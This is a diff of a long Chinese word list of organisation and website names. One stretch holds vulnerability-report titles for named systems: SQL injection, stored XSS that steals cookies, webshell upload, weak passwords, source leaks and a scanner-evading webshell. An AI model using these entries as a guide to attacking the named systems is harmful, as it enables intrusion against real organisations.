@@ zstu 甘肃省粮食局 甘肃省统计局 甘肃睿阳科技 +甘肃荣华实业 甘肃靖远煤电 生乐高校传媒 生意宝检测通 用友网络科技 申万宏源集团 申科滑动轴承 +申联生物医药 电光防爆科技 电子科技大学 界首市信访局 @@ -17526,9 +17497,11 @@ zstu 白象食品集团 白银区政府网 白银有色集团 +百世店加科技 百家好旗舰店 皇嘉贵金属网 皮皮私人影院 +盈世信息科技 盈康生命科技 益阳师范学校 盐城市体育局 @@ -17593,6 +17566,7 @@ zstu 福建闽东电力 福建顶点软件 福建龙净环保 +福建龙溪轴承 福田政府在线 福田雷沃重工 福达合金材料 @@ -17620,6 +17594,7 @@ zstu 精英在线教育 素材中国网站 紫光数字影像 +紫光日东科技 紫金矿业集团 红彤汽车集团 红美官方商城 @@ -17636,9 +17611,11 @@ zstu 绿港就业快车 绿色下载官网 网大国际学校 +网神信息技术 罗定市中医院 罗浮国药公司 罗莱生活科技 +美利达自行车 美嘉欢乐影城 美国购物网站 美奥口腔医院 @@ -17665,11 +17642,13 @@ zstu 联络互动官网 聚灿光电科技 聚美优品商城 +聚鲨环球精选 肇庆市司法局 肇庆开放大学 肥东县财政局 胜高酒店集团 胶州市水利局 +能力天空科技 腾冲市教育局 腾格金属艺术 腾达建设集团 @@ -17741,6 +17720,7 @@ zstu 蓝天远程教育 蓝带国际学院 蓝润实业官网 +蓝英通华技术 蚌埠市水利局 蚌埠市监察局 蝌蚪五线谱网 @@ -17819,6 +17799,7 @@ zstu 西部金属材料 西陵区新闻网 观致汽车中国 +视觉文化发展 许昌市商务局 许昌政府官网 诚邦生态环境 @@ -17839,6 +17820,7 @@ zstu 贵州川恒化工 贵州市图书馆 贵州师范大学 +贵州开磷控股 贵州开磷集团 贵州民族大学 贵州永吉印务 @@ -17874,6 +17856,7 @@ zstu 赫章县气象局 起跑线亲子网 跳一曲广场舞 +辅云电子商务 辰漫画网网站 辽宁大金重工 辽宁奥克化学 @@ -17902,13 +17885,16 @@ zstu 达刚控股集团 达州市公安局 达州市司法局 +达疆网络科技 运城市公安局 运城市食药局 运城食药监局 +运盛医疗科技 运维生存时间 运通中港速运 远东智慧能源 远东神华集团 +远光信息技术 远大产业控股 连云港人才网 连云港体育局 @@ -17919,6 +17905,7 @@ zstu 逆天邪神小说 通化东宝药业 通化师范学院 +通樱信息科技 通用控股集团 通辽职业学院 通鼎互联信息 @@ -17965,6 +17952,8 @@ zstu 重庆医科大学 重庆华森制药 重庆南开中学 +重庆城建控股 +重庆太极实业 重庆崇美科技 重庆工商大学 重庆工商职院 @@ -17982,11 +17971,13 @@ zstu 重庆师范大学 重庆广播大学 重庆建工集团 +重庆德庄实业 重庆文理学院 重庆水务集团 重庆燃气集团 重庆理工大学 重庆百货大楼 +重庆福安药业 重庆科技学院 重庆秦安机电 重庆美心集团 @@ -17995,6 +17986,8 @@ zstu 重庆警察学院 重庆邮电大学 重庆长安汽车 +重庆隆鑫地产 +量子高科生物 金亚洲游戏网 金华市人社局 金华市公安局 @@ -18024,8 +18017,10 @@ zstu 铜川市公安局 铜川市统计局 铜陵市公安局 +铭智华通科技 银川城市快讯 银川市公安局 +银川市商务局 银炬资讯平台 银都餐饮设备 锦州医科大学 @@ -18045,6 +18040,7 @@ zstu 镇江技师学院 镇海区政府办 镇海石化工程 +镜界网络科技 长岛县信访局 长春中天能源 长春光华学院 @@ -18108,6 +18104,7 @@ zstu 陕西师范大学 陕西广电网络 陕西康惠制药 +陕西延长石油 陕西建设机械 陕西汽车集团 陕西澄城政府 @@ -18133,6 +18130,7 @@ zstu 陕西省财政厅 陕西科技大学 陕西黑猫焦化 +隆华科技集团 隆基绿能科技 隆昌市公安局 隆昌市安监局 @@ -18187,6 +18185,7 @@ zstu 顺德区图书馆 顺电网上商城 颍东农商银行 +颐月信息技术 飞天诚信科技 飞龙汽车部件 食品工业科技 @@ -18223,6 +18222,7 @@ zstu 鹤壁人社平台 鹤峰人民政府 鹰潭市教育局 +麦克奥迪电气 黄冈师范学院 黄山市审计局 黄山市教育局 @@ -18260,114 +18260,8 @@ zstu 安阳市民之家 - 普惠金融 萤石商城官网 - 海康威视旗下网站 国际行李托运 海运搬家公司 -河北省保定市 华北电力大学(保定校区) +河北省保定市 华北电力大学 南京工业大学 岩土工程研究所 -冠捷科技集团(AOC) -上海三毛企业(集团) -上海凤凰企业(集团) -上海国际港务(集团) -上海复星医药(集团) -上海广电电气(集团) -上海振华重工(集团) -中国平安保险(集团) -乐鑫信息科技(上海) -亚士创能科技(上海) -优德精密工业(昆山) -全通教育集团(广东) -北京城乡商业(集团) -北京首旅酒店(集团) -华菱星马汽车(集团) -华辰精密装备(昆山) -华锐风电科技(集团) -南京中央商场(集团) -博瑞生物医药(苏州) -博通集成电路(上海) -哈尔滨高科技(集团) -嘉美食品包装(滁州) -安徽盛运环保(集团) -新疆雪峰科技(集团) -深圳市康达尔(集团) -甘肃亚盛实业(集团) -甘肃刚泰控股(集团) -甘肃国芳工贸(集团) -甘肃荣华实业(集团) -申联生物医药(上海) -福建龙溪轴承(集团) -重庆太极实业(集团) -隆华科技集团(洛阳) -香港中文大学(深圳) -北京金隅集团(股份)公司 -中国北方稀土(集团)高科技 -上海巴士公交(集团)有限公司 -上海锦江航运(集团)有限公司 -东方金融控股(香港)有限公司 -中建国际投资(中国)有限公司 -卓望信息技术(北京)有限公司 -南京公共交通(集团)有限公司 -央广小品科技(北京)有限公司 -成都蚂蚁物流(集团)有限公司 -日本财产保险(中国)有限公司 -江苏银茂控股(集团)有限公司 -百世物流科技(中国)有限公司 -筑客网络技术(上海)有限公司 -艾康生物技术(杭州)有限公司 -赛勉管理咨询(上海)有限公司 -重庆对外经贸(集团)有限公司 -三生国健药业(上海)股份有限公司 -上海三毛企业(集团)股份有限公司 -上海东方明珠(集团)股份有限公司 -上海凤凰企业(集团)股份有限公司 -上海国际港务(集团)股份有限公司 -上海复星医药(集团)股份有限公司 -上海广电电气(集团)股份有限公司 -上海振华重工(集团)股份有限公司 -东来涂料技术(上海)股份有限公司 -中国平安保险(集团)股份有限公司 -中国石油大学(北京)克拉玛依校区 -中国石油大学(北京)石油工程学院 -乐鑫信息科技(上海)股份有限公司 -亚士创能科技(上海)股份有限公司 -亚钾国际投资(广州)股份有限公司 -优德精密工业(昆山)股份有限公司 -全通教育集团(广东)股份有限公司 -前沿生物药业(南京)股份有限公司 -北京城乡商业(集团)股份有限公司 -北京首旅酒店(集团)股份有限公司 -华安鑫创控股(北京)股份有限公司 -华菱星马汽车(集团)股份有限公司 -华辰精密装备(昆山)股份有限公司 -华锐风电科技(集团)股份有限公司 -南京中央商场(集团)股份有限公司 -博瑞生物医药(苏州)股份有限公司 -博通集成电路(上海)股份有限公司 -哈尔滨高科技(集团)股份有限公司 -嘉美食品包装(滁州)股份有限公司 -宁波金田铜业(集团)股份有限公司 -安徽新华发行(集团)控股有限公司 -安徽皖江物流(集团)股份有限公司 -安徽盛运环保(集团)股份有限公司 -安科生物工程(集团)股份有限公司 -成都彩虹电器(集团)股份有限公司 -新疆雪峰科技(集团)股份有限公司 -昆明百货大楼(集团)股份有限公司 -深圳市康达尔(集团)股份有限公司 -深圳市飞亚达(集团)股份有限公司 -甘肃亚盛实业(集团)股份有限公司 -甘肃刚泰控股(集团)股份有限公司 -甘肃国芳工贸(集团)股份有限公司 -甘肃荣华实业(集团)股份有限公司 -申联生物医药(上海)股份有限公司 -福建龙溪轴承(集团)股份有限公司 -者尼文化传媒(北京)有限责任公司 -豆神教育科技(北京)股份有限公司 -重庆太极实业(集团)股份有限公司 -隆华科技集团(洛阳)股份有限公司 -首华燃气科技(上海)股份有限公司 -贵州茅台酒厂(集团)习酒有限责任公司 -中国北方稀土(集团)高科技股份有限公司 -康泰医学系统(秦皇岛)股份有限公司 -孔夫子旧书网(北京古城堡图书有限公司) -银川市商务局(肉类蔬菜流通追溯管理平台) 上海报业集团---澎湃新闻 博連資訊科技-Prolink Solutions 上海丹丰游艇-充气艇网 @@ -18450,6 +18344,7 @@ zstu 三六零安全科技 三江购物俱乐部 三河市人民政府 +三节课信息咨询 三茅人力资源网 三达膜环境技术 三门峡市司法局 @@ -18523,6 +18418,7 @@ zstu 东莞市技师学院 东莞金太阳研磨 东营市人民政府 +东营建设信息网 东营教育信息网 东部战区总医院 东阳市人民医院 @@ -18589,6 +18485,7 @@ zstu 中国城市建设网 中国复合材料网 中国天然气集团 +中国太平洋保险 中国失物招领网 中国安全教育网 中国宜春政府网 @@ -18708,6 +18605,7 @@ zstu 中山市第一中学 中山市育英学校 中山教育信息港 +中微半导体设备 中旅总社星旅网 中汽配件汽配会 中海油能源发展 @@ -18751,6 +18649,8 @@ zstu 乌海市人民政府 乐友孕婴童公司 乐山市旅游学校 +乐爱金财产保险 +乐视网信息技术 九州通医药集团 九江就业创业网 九江市人民政府 @@ -18801,8 +18701,10 @@ zstu 佛山市国星光电 佛山市燃气集团 佛山顺德区政府 +佰思通办公用品 佳木斯市农业局 依米康科技集团 +俏十岁生物科技 保千里视像集团 保定乐凯新材料 保定旅游资讯网 @@ -18812,6 +18714,7 @@ zstu 信雅达系统工程 偃师市人民政府 健康元药业集团 +元翔国际航空港 光明房地产集团 克山县人民政府 克拉玛依市政府 @@ -18856,6 +18759,7 @@ zstu 凤凰县人民政府 凤泉党政信息网 凤翔乡村在线网 +凯莱英医药集团 刚察县人民政府 利津县中心医院 券粉丝优惠券网 @@ -18890,6 +18794,7 @@ zstu 北京教育信息网 北京教育考试院 北京新雷能科技 +北京王府井百货 北京真视通科技 北京眼科研究所 北京碧水源科技 @@ -18912,9 +18817,11 @@ zstu 十里香股份公司 千阳县政协网站 华东医药商务网 +华为公共云服务 华人医生数据库 华南碧桂圆学校 华夏大地教育网 +华懋新材料科技 华油惠博普科技 华能澜沧江水电 华融道理财平台 @@ -18965,6 +18872,7 @@ zstu 博迈科海洋工程 卢龙县人民政府 卧龙区人民政府 +卫盈联信息技术 卫辉市人民政府 厦门三维丝环保 厦门仲裁委员会 @@ -18983,6 +18891,7 @@ zstu 句容市人民法院 可再生能源杂志 可口可乐博物馆 +台州市中心医院 台州市社会保险 台湾乐居房产网 台湾肾脏医学会 @@ -19034,6 +18943,7 @@ zstu 哈尔滨金融学院 响水县委组织部 哔哩哔哩弹幕网 +哦加哦网络科技 唐山市交警支队 唐山市人民医院 唐朝演艺伴奏网 @@ -19044,6 +18954,7 @@ zstu 嘉兴市人民政府 嘉兴英语教学网 嘉年乐老年商城 +嘉必优生物技术 嘉祥县人民政府 嘉荫县人民政府 四川一体化政务 @@ -19057,6 +18968,7 @@ zstu 四川政府服务网 四川政府采购网 四川新金路集团 +四川新闻网传媒 四川智造人才网 四川汇源光通信 四川省三台中学 @@ -19067,6 +18979,7 @@ zstu 四川省肿瘤医院 四川省通江中学 四川通江党建网 +四川金宇汽车城 回头鱼官方网站 固镇县人民政府 国家卫生计生委 @@ -19096,6 +19009,7 @@ zstu 大参林医药集团 大同市人民政府 大姚县人民政府 +大宇宙信息创造 大庆市人大常委 大庆市人民政府 大庆市纪检监察 @@ -19135,7 +19049,9 @@ zstu 奉化机关党建网 奉贤区古华中学 奥克斯空调商城 +好利来电子科技 好利来蛋糕官网 +好利来食品科技 好想你健康食品 如东县人民政府 如皋市人民医院 @@ -19145,6 +19061,7 @@ zstu 娃哈哈集团公司 婺源县人民政府 孙吴人民政府网 +孩子王儿童用品 宁乡市人民政府 宁夏交通运输厅 宁夏会计信息网 @@ -19188,6 +19105,7 @@ zstu 安徽神剑新材料 安徽金种子酒业 安徽集友新材料 +安徽鸿路钢结构 安徽黄山气象局 安溪铁观音集团 安福县海能实业 @@ -19195,6 +19113,7 @@ zstu 安阳市眼科医院 安阳环境保护局 安阳环境生态局 +安集微电子科技 安顺市人民政府 宕昌县人民政府 定州市人民政府 @@ -19206,6 +19125,7 @@ zstu 宜昌交警云平台 宜昌市人民政府 宜春市人民政府 +宜高美信息服务 宝安区政府在线 宝应县人民政府 宝鸡市人民政府 @@ -19230,11 +19150,13 @@ zstu 小葵花妈妈课堂 少年智力开发报 就业指南网官网 +展动力人才资讯 山东中医药大学 山东保险信息网 山东华宇工学院 山东博兴教育局 山东卫生监督网 +山东大学医学院 山东广播电视台 山东得利斯食品 山东招标采购网 @@ -19382,6 +19304,7 @@ zstu 张家口市司法局 张家口市扶贫办 张家口市统计局 +张家港保税科技 张家港市政府网 张家港港务集团 张家界旅游集团 @@ -19454,15 +19377,18 @@ zstu 文安县人民政府 文山州人民政府 文档投稿赚钱网 +斯得雅有限公司 新世界教育集团 新中新有限公司 新乐市人民政府 +新分享科技服务 新华书店阅淘网 新华都购物广场 新大陆数字技术 新学商网上商城 新建区人民政府 新怡和控股集团 +新时代健康产业 新明珠陶瓷集团 新林区人民政府 新洋丰农业科技 @@ -19485,6 +19411,7 @@ zstu 无锡市太极实业 无锡贝斯特精机 无锡阿科力科技 +日本国家旅游局 时进智慧创意网 昆山人力资源网 昆山市人民政府 @@ -19511,6 +19438,7 @@ zstu 晶澳太阳能科技 暨南大学出版社 曲阜市人民医院 +曼帕尔人力资源 朝阳卫生监督网 朝阳县人民政府 朝阳市人民政府 @@ -19533,6 +19461,7 @@ zstu 杭州星帅尔电器 杭州滨江人才网 杭州省府路小学 +杰西博工程机械 松江第一招聘网 枣庄卫生人才网 枣庄政府采购网 @@ -19644,11 +19573,13 @@ zstu 江西建设监督网 江西政务服务网 江西省人民政府 +江西省外事侨务 江西省希望工程 江西省能源集团 江西美术出版社 江西萍乡民革网 江门市科恒实业 +江门甘蔗化工厂 江阳区政协论坛 江阳市人民医院 江阴市恒润重工 @@ -19698,6 +19629,7 @@ zstu 泉州市人民政府 泉州广播电视台 法治呼和浩特网 +波司登国际服饰 波司登控股集团 波音:波音中国 泰安市中医医院 @@ -19755,6 +19687,7 @@ zstu 海南房产地图网 海南省人民医院 海南省人民政府 +海南省农业学校 海口市人民政府 海口综合保税区 海宁中国皮革城 @@ -19784,6 +19717,7 @@ zstu 淮安市人大常委 淮河水利委员会 深圳世联行集团 +深圳中华自行车 深圳信立泰药业 深圳友讯达科技 深圳可立克科技 @@ -19828,6 +19762,7 @@ zstu 深圳市洲明科技 深圳市深粮控股 深圳市燃气集团 +深圳市物业发展 深圳市特发信息 深圳市瑞凌实业 深圳市盛弘电气 @@ -19979,6 +19914,7 @@ zstu 白云山制药总厂 白水县人民政府 白马寺官方网站 +百塔工业品贸易 百富计算机技术 百联股份百联股 盈科律师事务所 @@ -20012,6 +19948,7 @@ zstu 福建广生堂药业 福建永春政府网 福建省仰恩大学 +福建省永安林业 福建省闽发铝业 福建省青山纸业 福建社会科学院 @@ -20028,7 +19965,6 @@ zstu 秦皇岛生产力网 秭归县人民政府 移动互联网资讯 -移宝网(联通) 站长们资源平台 章丘政府办公室 端州区人民政府 @@ -20055,6 +19991,7 @@ zstu 罗奇堡家居官网 罗定市人民政府 罗浮山国药公司 +美年大健康产业 考试资料资讯网 聊城市政府采购 聊城档案信息网 @@ -20064,9 +20001,11 @@ zstu 肇庆市人民政府 肥城市智慧党建 肥西县人民政府 +舒泰神生物制药 舟山市文体地图 舟山普陀山机场 航天彩虹无人机 +艺龙网信息技术 艾玛女人女性网 艾百思科技网络 芒果网有限公司 @@ -20123,6 +20062,7 @@ zstu 西藏纪检监察网 西藏诺迪康药业 西觅亚官方网站 +西铁城官方网站 讷河市人民政府 许昌市人民政府 许昌张氏乐器厂 @@ -20262,6 +20202,7 @@ zstu 长春广播电视台 长春新区政务网 长春高新人才网 +长江精工钢结构 长江航务管理局 长沙人才网网站 长沙市中心医院 @@ -20295,6 +20236,7 @@ zstu 陕西档案信息网 陕西省劳保统筹 陕西省国际信托 +陕西省地方电力 陕西省福利彩票 陕西省红十字会 陕西省肿瘤医院 @@ -20309,6 +20251,7 @@ zstu 集食惠购物商城 雨山区人民政府 雷迪森旅业集团 +震坤行工业超市 霸州市人民政府 青少年活动中心 青岛价格认定网 @@ -20334,6 +20277,7 @@ zstu 顺昌县人民政府 飞客茶馆旅行网 飞捷意式生活馆 +飞行家投资管理 香河家具城官网 香港大学出版社 香港电路板协会 @@ -20407,59 +20351,9 @@ zstu 龙虎山官方网站 龙蟒佰利联集团 龙里县人民政府 -山东大学医学院 湖州师范医学院 护理学院 中国医学科学院 北京协和医学院 中共大竹县纪委 大竹县监察局网站 -中国太平洋保险(集团) -中微半导体设备(上海) -乐视网信息技术(北京) -凯莱英医药集团(天津) -嘉必优生物技术(武汉) -四川金宇汽车城(集团) -安徽鸿路钢结构(集团) -安集微电子科技(上海) -张家港保税科技(集团) -日本国家旅游局(中国) -江门甘蔗化工厂(集团) -深圳中华自行车(集团) -深圳市物业发展(集团) -福建省永安林业(集团) -长江精工钢结构(集团) -云付通支付科技(深圳)有限公司 -人人贷商务顾问(北京)有限公司 -佰思通办公用品(上海)有限公司 -大中华国际集团(中国)有限公司 -广东广物房地产(集团)有限公司 -掌上通航空服务(北京)有限公司 -梁黄顾建筑设计(深圳)有限公司 -深圳市人力资本(集团)有限公司 -百富计算机技术(深圳)有限公司 -重庆市轨道交通(集团)有限公司 -中国太平洋保险(集团)股份有限公司 -中微半导体设备(上海)股份有限公司 -乐视网信息技术(北京)股份有限公司 -俏十岁生物科技(北京)股份有限公司 -凯莱英医药集团(天津)股份有限公司 -嘉必优生物技术(武汉)股份有限公司 -四川金宇汽车城(集团)股份有限公司 -天下秀数字科技(集团)股份有限公司 -安徽鸿路钢结构(集团)股份有限公司 -安集微电子科技(上海)股份有限公司 -张家港保税科技(集团)股份有限公司 -江门甘蔗化工厂(集团)股份有限公司 -深圳中华自行车(集团)股份有限公司 -深圳市物业发展(集团)股份有限公司 -猛狮新能源科技(河南)股份有限公司 -福建省永安林业(集团)股份有限公司 -福建省电子信息(集团)有限责任公司 -福立旺精密机电(中国)股份有限公司 -重庆市汽车运输(集团)有限责任公司 -长江精工钢结构(集团)股份有限公司 -中国伊春农产品(森林食品)网上大市场 -周口市行政服务(公共资源交易)中心 -江西省外事侨务(港澳事务)办公室 -台州市中心医院(台州学院附属医院) 淮安微警务平台--系统多处弱口令 淮安透明食药监--论坛系统弱口令 模版堂旗下系统-ECTouch 3处SQL注入 @@ -20487,19 +20381,18 @@ zstu 混淆一句话绕过D盾 锦州银行 锦银E购 青铜器软件使用RDM存在文件上传漏洞,可上传webshell -聚鲨环球精选(SHARK SHOPPING) 一采通采购系统SQL注入2 一采通采购系统SQL注入漏洞 +某人力资源系统SQL注入漏洞 +某智能网关系统SQL注入漏洞 通用办公云系统SQL注入漏洞 通用办公云系统SQL注入漏洞1 一采通采购系统SQL注入漏洞2 一采通采购系统SQL注入漏洞3 -某智能网关系统SQL注入漏洞(无需登录) -某人力资源系统SQL注入漏洞(无需登录,可shell) 一采通采购系统UNION注入 希赛教育存储型XSS漏洞 国家烟草专卖局_old -预决算公开平台_北部生态新区(阳和工业新区)管理委员会 +预决算公开平台_北部生态新区管理委员会 好大夫在线手机app 某信息管理系统getshell 一采通采购系统sql注入 @@ -20509,6 +20402,7 @@ zstu 翼商城系统存储xss2可打任意cookie 翼商城系统存储xss可获取任意商户ccokie 一二六家具人才网 +一嗨租车服务管理 一汽大众有限公司 一览网络有限公司 七田阳光全脑教育 @@ -20525,6 +20419,7 @@ zstu 三门峡市人民政府 上海中信信息发展 上海中博专修学院 +上海交运巴士客运 上海保隆汽车科技 上海健一网大药房 上海凯众材料科技 @@ -20543,6 +20438,7 @@ zstu 上海嘉麟杰纺织品 上海国家会计学院 上海复旦复华科技 +上海大众公用事业 上海大学附属中学 上海大宁商业广场 上海天永智能装备 @@ -20572,6 +20468,8 @@ zstu 上海市环境保护局 上海市肿瘤研究所 上海应用技术大学 +上海延华智能科技 +上海微创医疗器械 上海思博职业学校 上海悦心健康集团 上海拉夏贝尔服饰 @@ -20612,7 +20510,10 @@ zstu 上海莱士血液制品 上海袋式除尘配件 上海视觉艺术学院 +上海豫园旅游商城 上海超级计算中心 +上海远丰信息科技 +上海连成有限公司 上海透景生命科技 上海钢联电子商务 上海锦江国际酒店 @@ -20627,6 +20528,7 @@ zstu 上海龙韵传媒集团 上饶市城乡规划局 上饶职业技术学院 +且康健康管理咨询 世纪天鸿教育科技 东北亚卫视资讯网 东华软件股份公司 @@ -20702,6 +20604,8 @@ zstu 中国冶金建设协会 中国冶金科工集团 中国出版集团公司 +中国副食品批发网 +中国动向有限公司 中国医药健康产业 中国医药包装协会 中国华电集团公司 @@ -20722,6 +20626,7 @@ zstu 中国城市规划学会 中国外汇交易中心 中国大唐集团公司 +中国大顺国际物流 中国奶牛数据中心 中国学术会议在线 中国家电制冷网络 @@ -20754,6 +20659,7 @@ zstu 中国海诚工程科技 中国混凝土机械网 中国潮州政府网站 +中国煤炭交易中心 中国煤炭地质总局 中国物品编码中心 中国环境检测总站 @@ -20798,6 +20704,7 @@ zstu 中国证券行业协会 中国贵州茅台酒厂 中国邮政储蓄银行 +中国重汽有限公司 中国金币网上商城 中国金融认证中心 中国铁合金信息网 @@ -20806,6 +20713,7 @@ zstu 中国青年政治学院 中国项目管理在线 中国饮料工业协会 +中国首钢水城钢铁 中国黄金集团公司 中域电讯官方网站 中大期货有限公司 @@ -20824,12 +20732,14 @@ zstu 中山联合光电科技 中广核核技术发展 中康科技有限公司 +中报国际文化传媒 中文百科在线网站 中新网络信息安全 中材水泥有限公司 中核苏阀科技实业 中检广西认证系统 中潜股份有限公司 +中炬高新技术实业 中盐能源有限公司 中石洛阳工程公司 中科云网科技集团 @@ -20848,6 +20758,7 @@ zstu 中远海运能源运输 中钢国际工程技术 中铁信息工程集团 +中青网新媒体科技 临夏州妇幼保健院 临朐县人大常委会 丹东市人才市场网 @@ -20896,6 +20807,8 @@ zstu 云浮市社会保障局 互助县人民政府网 五凌电力有限公司 +五洲汉风网络科技 +亚翔系统集成科技 交通运输部海事局 亨通集团有限公司 京汉实业投资集团 @@ -20915,6 +20828,7 @@ zstu 优购科技有限公司 会声会影中文官网 伟艳黑羊养殖基地 +伽蓝股份有限公司 体育彩票管理中心 佛山佛塑科技集团 佛山市外国语学校 @@ -20923,6 +20837,7 @@ zstu 佛山市童星幼儿园 佛山科学技术学院 佛山第四人民医院 +你好汇众科技发展 佩蒂动物营养科技 佳木斯市人民政府 佳木斯环保公众网 @@ -20934,10 +20849,6 @@ zstu 保山市环境保护局 信发集团有限公司 信用中国湖北黄石 -信用中国(云南) -信用中国(吉林) -信用中国(辽宁) -信用中国(陕西) 健帆生物科技集团 元谋县公众信息网 光大期货有限公司 @@ -20948,7 +20859,9 @@ zstu 公务员考试信息网 公安部交通管理局 公安部第一研究所 +六六八八科技发展 六安团市委官方站 +六安市国土资源局 六安市旅游委员会 六安市环境保护局 兰州中川国际机场 @@ -21049,6 +20962,7 @@ zstu 北京市第十四中学 北京市顺义区政府 北京康拓红外技术 +北京建谊投资发展 北京张家湾生活网 北京当升材料科技 北京影视研修学院 @@ -21087,6 +21001,7 @@ zstu 北京财贸职业学院 北京金一文化发展 北京金山办公软件 +北京金隅集团公司 北京钢研高纳科技 北京银信长远科技 北京青年政治学院 @@ -21095,9 +21010,11 @@ zstu 北华航天工业学院 北大附中河南分校 北戴河旅游住宿网 +北斗导航位置服务 北方华创科技集团 北方华锦化学工业 北方导航控制技术 +北方联合出版传媒 北极星环保招聘网 北极星电力招聘网 北极星电气招聘网 @@ -21119,6 +21036,7 @@ zstu 华帝股份有限公司 华扬联众数字技术 华测检测认证集团 +华硕电脑有限公司 华纺股份有限公司 华美网整形平台网 华联期货有限公司 @@ -21146,6 +21064,7 @@ zstu 南京航天航空大学 南京航空航天大学 南京越博动力系统 +南京音飞储存设备 南充职业技术学院 南召国土资源局网 南宁南国妇产医院 @@ -21241,6 +21160,7 @@ zstu 同年同月同日生网 同方股份有限公司 同盾科技有限公司 +名门地产有限公司 吕梁市临县人大网 吕梁市卫生监督所 启迪巨人教育官网 @@ -21251,6 +21171,7 @@ zstu 呱呱财经官方网站 呼伦贝尔市财政局 呼和浩特机关党建 +和冠科技有限公司 咸宁职业技术学院 咸阳市环境保护局 咸阳职业技术学院 @@ -21322,6 +21243,7 @@ zstu 四川长江职业学院 四川雅化实业集团 国信房地产信息网 +国信蓝桥教育科技 国家公务员考试网 国家图书馆出版社 国家广播电视总局 @@ -21349,6 +21271,7 @@ zstu 在线生肖属相查询 垦利区人民检察院 塔城市人民政府网 +复地股份有限公司 外教中国英语培训 多个政府信用平台 大兴安岭职业学院 @@ -21400,6 +21323,7 @@ zstu 天津富通鑫茂科技 天津市互联网协会 天津市再生资源网 +天津市房地产发展 天津市政府采购网 天津市教育委员会 天津市电化教育馆 @@ -21480,6 +21404,7 @@ zstu 安徽合肥市旅游局 安徽合肥旅游学院 安徽安利材料科技 +安徽安科生物工程 安徽审计职业学院 安徽山河药用辅料 安徽广播电视大学 @@ -21520,6 +21445,7 @@ zstu 安阳县人事人才网 安阳市人大常委会 宏和电子材料科技 +宏碁电脑有限公司 定海区消费维权网 定远县国土资源局 宜兴市人民检察院 @@ -21533,11 +21459,13 @@ zstu 宜秀区政法委员会 宜都市人民政府网 宜阳县人民检察院 +宝沃汽车有限公司 宝胜集团有限公司 宝钢集团有限公司 宝鸡市国家保密局 宝鸡市渭滨区政府 宝鸡职业技术学院 +宣亚国际营销科技 宣化科技职业学院 宣城市农业委员会 宿州市农业委员会 @@ -21553,6 +21481,8 @@ zstu 对外经济贸易大学 寻乌县纪检监察网 射阳县环境保护局 +小松投资有限公司 +小船出海教育科技 尚纬股份有限公司 屏東縣政府教育處 山东三维石化工程 @@ -21566,14 +21496,16 @@ zstu 山东商务职业学院 山东国瓷功能材料 山东墨龙石油机械 +山东大学口腔医院 山东大学威海分校 山东大学威海校区 山东大学学生在线 +山东大学护理学院 +山东大学研究生处 山东大学研究生院 山东大学第二医院 山东大学缴税平台 山东大学附属中学 -山东大学(威海) 山东天鹅棉业机械 山东奥福环保科技 山东宏创铝业控股 @@ -21606,6 +21538,7 @@ zstu 山东省教育基金会 山东省教育科研网 山东省淄博市政府 +山东省烟草专卖局 山东省监狱管理局 山东省科学技术厅 山东省章丘鼓风机 @@ -21624,6 +21557,7 @@ zstu 山东鲁阳节能材料 山东龙力生物科技 山东龙泉管道工程 +山善贸易有限公司 山河智能装备集团 山煤国际能源集团 山石网科通信技术 @@ -21766,6 +21700,7 @@ zstu 广东龙光有限公司 广元市人民检察院 广元市利州区政府 +广发控股廣發地產 广发期货有限公司 广州万孚生物技术 广州东凌国际投资 @@ -21833,6 +21768,8 @@ zstu 庆阳市人民检察院 庆阳市环境保护局 庆阳市知识产权局 +库柏电气有限公司 +康龙化成新药技术 廉江市人民政府网 廊坊卫生职业学院 廊坊市交通运输局 @@ -21876,10 +21813,13 @@ zstu 德阳市政府办公室 德阳市环境保护局 德龙钢铁有限公司 +快尚时装有限公司 +快快金融信息服务 快易捷药品交易网 忻州职业技术学院 怀化职业技术学院 思建科技有限公司 +怡球金属资源再生 恒大人寿保险公司 恒宝股份有限公司 恒立实业发展集团 @@ -21967,6 +21907,7 @@ zstu 新疆生产建设兵团 新疆自治区科技厅 新疆贝肯能源工程 +新疆青松建材化工 方圆集团有限公司 方大股份有限公司 方太营销有限公司 @@ -22002,10 +21943,12 @@ zstu 昌吉州水利管理网 昌都市纪检监察网 明水县永久乡党政 +明纬电子有限公司 易仓科技有限公司 易学啦高中学习网 易宝支付有限公司 易方科贸有限公司 +易淘星空网络科技 易石餐饮软件网站 易联支付有限公司 昔阳县人民政府网 @@ -22098,6 +22041,7 @@ zstu 榆林精品团购网站 榆林职业技术学院 横店集团得邦照明 +欣强电子有限公司 欣贺股份有限公司 歌尔股份有限公司 正保远程教育集团 @@ -22332,6 +22276,7 @@ zstu 泉州安溪县教育局 泉州市科技信息网 泉州房地产信息网 +法兰琳卡官方网站 法国签证代办中心 法律援助服务平台 法律法规检索平台 @@ -22508,6 +22453,7 @@ zstu 深圳市市场监管委 深圳市广和通无线 深圳市广晟德集团 +深圳市新南山控股 深圳市杰普特光电 深圳市沃特新材料 深圳市漫步者科技 @@ -22627,6 +22573,7 @@ zstu 湛江国联水产开发 湛江市城市规划局 滕州市高新区政府 +满记甜品有限公司 漯河市城市管理局 漯河市政府应急办 漯河市环境保护局 @@ -22639,6 +22586,7 @@ zstu 澳洋集团有限公司 濉溪县妇女联合会 濮阳惠成电子材料 +濮阳濮耐高温材料 濮阳职业技术学院 灌南县人民法院网 灵丘县人民政府网 @@ -22669,6 +22617,7 @@ zstu 环球财富物业中心 珠晖区党政门户网 珠海世纪鼎利科技 +珠海企业服务平台 珠海华冠科技股份 珠海和佳医疗设备 珠海市交通运输局 @@ -22816,6 +22765,7 @@ zstu 肇庆市生态环境局 股民老张证券培训 胶州市教育体育局 +腾讯科技有限公司 自如二期源码泄露 自贡市监察委员会 致同会计师事务所 @@ -22827,6 +22777,7 @@ zstu 舟山市房产信息网 舟山市普陀廉政网 舟山广播电视总台 +航天万源实业公司 航天时代电子技术 航天科技控股集团 航天通信控股集团 @@ -22861,6 +22812,8 @@ zstu 荆州市房产管理局 荆州职业技术学院 荆门市房产管理局 +荣昌耀华网络技术 +莱克电气绿能科技 莲花健康产业集团 菏泽价格一点通网 菏泽医学专科学校 @@ -22872,10 +22825,13 @@ zstu 营口市教育信息网 营口市金融发展局 蒙城县纪检监察网 +蓝海天扬影视文化 蓝盾信息安全技术 蓝色光标集团官网 蓝鸥科技有限公司 蕉岭县国土资源局 +藤门出国留学服务 +虫星科技有限公司 蛟河市共青团市委 蜗牛游戏有限公司 融捷股份有限公司 @@ -22920,6 +22876,7 @@ zstu 许昌市审计信息网 许昌职业技术学院 诚志股份有限公司 +诺心食品有限公司 